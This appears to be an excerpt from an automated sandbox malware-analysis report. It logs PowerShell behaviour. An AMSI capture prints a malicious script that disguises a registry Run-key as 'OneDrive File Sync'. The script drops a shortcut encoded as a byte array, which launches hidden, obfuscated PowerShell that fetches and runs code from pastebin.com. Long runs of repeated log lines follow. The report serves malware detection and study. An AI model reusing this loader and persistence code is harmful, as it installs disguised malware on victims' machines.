Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Tries to open files direct via NTFS file id
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
